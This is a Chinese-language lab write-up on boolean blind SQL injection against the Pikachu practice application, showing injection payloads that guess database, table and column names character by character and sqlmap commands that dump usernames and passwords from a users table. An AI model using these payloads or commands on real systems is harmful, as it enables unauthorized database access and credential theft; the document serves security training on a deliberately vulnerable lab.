0
点赞
收藏
分享

微信扫一扫

pikachu SQL 注入(盲注)

陆佃 2022-04-19 阅读 54
网络安全

SQL盲注

1.判断是否存在注入点

kobe' and 1=1#  正常返回结果

kobe' and 1=2# 返回空结果

2

2.猜测数据库长度(burp探测)

kobe' and length(database())>=k #

数据库的长度为7

2. 猜测数据库名

kobe' and (select substr(database(),1,1))='k'#

得到数据库名为pikachu

3.盲注表名猜测

 kobe' and length((select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' )) = 1 # 猜测结果长度

长度是38

如图的到表长度为38

kobe' and substr((select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu' ),1,1) = 'a' # 单字符猜测结果

得到表名httpinfo,member,message,users,xssblind

4.盲注列名猜解,和猜解表名一个方法

得到长度为26

5.使用sqlmap自动探测和数据挖掘,注意,使用的IP地址不能是127.0.0.1

 1. 探测目标是否存在注入漏洞

sqlmap -r 111.txt --technique=B --string="您查询的数据存在”

 探测到布尔型漏洞

2.获取数据库名称

 

3. 获取pikachu数据库表信息

sqlmap -r 111.txt -D pikachu –tables

4. 获取users表的列信息

sqlmap -r 111.txt -D pikachu -T users –columns

5. 获取users表数据

sqlmap -r 111.txt -D pikachu -T users -C username,password –dump

举报

相关推荐

0 条评论